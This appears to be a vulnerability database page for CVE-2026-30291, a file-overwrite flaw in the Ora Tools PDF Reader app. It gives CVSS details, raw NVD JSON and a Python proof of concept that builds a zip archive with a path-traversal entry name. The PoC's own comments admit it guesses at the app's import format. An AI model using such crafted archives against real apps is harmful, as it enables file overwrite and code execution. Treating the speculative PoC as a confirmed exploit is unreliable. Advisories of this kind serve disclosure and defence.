Security Vulnerability Report
CVE-2026-30291 CVSS 8.4 HIGH

CVE-2026-30291

Published: 2026-04-01 15:22:59
Last Modified: 2026-04-27 19:18:47

Description

An arbitrary file overwrite vulnerability in Ora Tools PDF Reader ' Reader & Editor APPv4.3.5 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ora Tools PDF Reader v4.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import zipfile

# Proof of Concept for CVE-2026-30291
# This script creates a malicious file attempting path traversal


def create_malicious_poc():
    # The malicious payload content
    payload_content = b"MALICIOUS_CODE_EXECUTION"

    # Path traversal filename to overwrite critical files
    # Note: Actual target path depends on the app's implementation
    malicious_filename = "../../../../../tmp/pwned.txt"

    # Create a zip file (if the app handles zips) or just the file
    # Assuming the app imports a specific format
    with zipfile.ZipFile('malicious_poc.zip', 'w') as zf:
        # Attempt to write outside the extraction directory
        zf.writestr(malicious_filename, payload_content)

    print(f"[+] Created malicious_poc.zip with file: {malicious_filename}")
    print("[+] Import this file into Ora Tools PDF Reader to trigger.")


if __name__ == "__main__":
    create_malicious_poc()
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-30291",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T15:22:58.943",
    "lastModified": "2026-04-27T19:18:46.690",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An arbitrary file overwrite vulnerability in Ora Tools PDF Reader ' Reader & Editor APPv4.3.5 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.4,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-73"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Secsys-FDU/AF_CVEs/issues/18",
        "source": "[email protected]"
      },
      {
        "url": "https://oratools.github.io/",
        "source": "[email protected]"
      },
      {
        "url": "https://play.google.com/store/apps/details?id=pdf.reader.editor.office.ora",
        "source": "[email protected]"
      },
      {
        "url": "https://secsys.fudan.edu.cn/",
        "source": "[email protected]"
      }
    ]
  }
}
```